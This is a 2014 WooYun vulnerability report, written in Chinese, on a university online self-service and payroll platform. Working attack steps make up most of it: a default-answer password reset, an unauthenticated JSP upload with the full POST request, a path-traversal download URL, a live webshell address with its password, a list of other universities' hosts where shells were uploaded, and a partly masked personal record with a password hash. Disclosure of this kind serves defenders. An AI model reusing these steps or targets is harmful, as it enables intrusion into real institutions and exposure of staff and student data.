当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-087767

漏洞标题:某网上自助平台通用型漏洞打包

相关厂商:天津神州浩天科技有限公司

漏洞作者: 路人甲

提交时间:2014-12-19 13:11

修复时间:2015-03-19 13:12

公开时间:2015-03-19 13:12

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-12-19: 细节已通知厂商并且等待厂商处理中
2014-12-24: 厂商已经确认,细节仅向厂商公开
2014-12-27: 细节向第三方安全合作伙伴开放
2015-02-17: 细节向核心白帽子及相关领域专家公开
2015-02-27: 细节向普通白帽子公开
2015-03-09: 细节向实习白帽子公开
2015-03-19: 细节向公众公开

简要描述:

今天学习的内容如下:
1#任意重置密码
2#前台无限制任意文件上传
3#任意文件下载
4#某处功能设计不当,导致大量用户敏感信息泄漏

详细说明:

系统名称:网上自助平台/网上申报管理系统/薪酬申报管理系统,但源码是同一套的。
关键字:gxwssb、大学网上自助平台
备注一下:该系统目前大部分运用在高校内网,外网案例较少
1#任意重置密码
以厦门理工学院为例http://58.199.193.57:8080/gxwssb/,通过贴吧获得某人学号(12******15),点击忘记密码(部分版本没有忘记密码这个链接),在密码答案处,直接输入000000(000000是系统默认配置),点击确定,密码即被重置为学号

QQ截图20141218220741.jpg


QQ截图20141218220756.jpg


而且,我们在找回密码的时候进行抓包可以发现,输入正确的学号后,不输入密码,直接点击找回密码,此时系统执行了一个查询操作,并直接把查询结果返回给了用户,包括疑似用户密码[upw]和密码问题答案[answer]

�����
/5/onResult������
DSK�
�#+com.qx.pojo.SysqxUser	mkdm
yxdlbjadminnoStr
answerissysadmin
uname	suid selectedissysadminStrjghadminno
email
ywmkdmupwyxdlbjStrsqrtelquestion1
0000000 黄江涛 12*******50,[email protected] A949943C5********DEC85CAA30C0BF *Bt��v���!��`n��H�U�Kŧ�!���;�
R'r_�ק=!T?̇�kv�]����


虽然有点乱码,但勉强看得懂

QQ截图20141218222512.jpg


之后通过重置好的密码,成功登录系统。
2#前台无限制任意文件上传
登录系统后,虽然学生没有录入的权限,但没关系,神奇的程序员没有对导入功能做权限判断

QQ截图20141218215758.jpg


导入excel,抓包分析

QQ截图20141218223712.jpg


QQ截图20141218223740.jpg


虽然会提示个空指针错误(也许是因为我excel内容空的原因,没关系,操作继续),可以看到,返回上传成功的信息,以及关键的上传路径。

success,C:\Program Files\Apache Software Foundation\Tomcat 5.5\webapps\gxwssb\sjwj\6129test.xls


稍微修改一下包里的test.xls内容

POST http://58.199.193.57:8080/gxwssb/addhunansjwj?filename=6129test.xls HTTP/1.1
Accept: text/*
Content-Type: multipart/form-data; boundary=----------gL6ae0cH2Ij5KM7cH2GI3ei4Ij5ei4
User-Agent: Shockwave Flash
Host: 58.199.193.57:8080
Content-Length: 425
Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=7227BF80C9670870180708A1E0D7892B
------------gL6ae0cH2Ij5KM7cH2GI3ei4Ij5ei4
Content-Disposition: form-data; name="Filename"
test.xls
------------gL6ae0cH2Ij5KM7cH2GI3ei4Ij5ei4
Content-Disposition: form-data; name="Filedata"; filename="test.xls"
Content-Type: application/octet-stream
wooyun test
------------gL6ae0cH2Ij5KM7cH2GI3ei4Ij5ei4
Content-Disposition: form-data; name="Upload"
Submit Query
------------gL6ae0cH2Ij5KM7cH2GI3ei4Ij5ei4--


我们可以通过修改filename=6129test.xls来达到上传jsp的效果
http://58.199.193.57:8080/gxwssb/addhunansjwj?filename=wooyun.jsp

QQ截图20141218224518.jpg


http://58.199.193.57:8080/gxwssb/sjwj/wooyun.jsp

QQ截图20141218224600.jpg


事情到这里,当然不回结束,我们试试把cookie清了再上传

QQ截图20141218224738.jpg


QQ截图20141218224751.jpg


美好的事情发生了,无须登录,前台getshell
一句话地址:http://58.199.193.57:8080/gxwssb/sjwj/7348test.jsp
密码:sqzr

QQ截图20141218225220.jpg


当然,目录里有许多的敏感信息,都是钱钱钱,我喜欢,话说老师工资好高
3#任意文件下载
既然有录入,那肯定就有导出了,点击学生模板导出,抓包

QQ截图20141218225427.jpg


注销用户后

http://58.199.193.57:8080/gxwssb/fileDownloadmodel?name=../WEB-INF/web.xml


清cookie

QQ截图20141218225831.jpg


4#某处功能设计不当,导致大量用户敏感信息泄漏
虽然我只是一个学生帐号登录,但我可以做的比想象的多,在批量录入帮助中

QQ截图20141218230101.jpg


QQ截图20141218230125.jpg


通过抓包,可以获取到所选取的班级的所有童鞋的身份证号、学号、银行卡,全校失身啊.

QQ截图20141218230256.jpg


这是多么痛的领悟

漏洞证明:

提供另外几个外网案例
http://219.243.39.184:8080/gxwssb 天津大学网上自助平台
http://lwsb.njau.edu.cn/gxwssb/ 南京农业大学网上自助平台
http://jcc.fafu.edu.cn:8080/gxwssb/ 福建农林大学网上自助平台
http://jccids.chd.edu.cn:8080/gxwssb/SJZX.html 长安大学网上自助平台
http://cwsb.swu.edu.cn/gxwssb/SJZX.html 西南大学网上自助平台
http://lwsb.njau.edu.cn/gxwssb/sjwj/wooyun.jsp
http://jcc.fafu.edu.cn:8080/gxwssb/sjwj/wooyun.jsp
http://219.243.39.184:8080/gxwssb/sjwj/wooyun.jsp
http://jccids.chd.edu.cn:8080/gxwssb/sjwj/wooyun.jsp
http://cwsb.swu.edu.cn/gxwssb/sjwj/wooyun.jsp

QQ截图20141218231315.jpg


大部分的案例都在校园网

修复方案:

加强权限控制
修改对应的问题代码

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-12-24 08:41

厂商回复:

最新状态:

暂无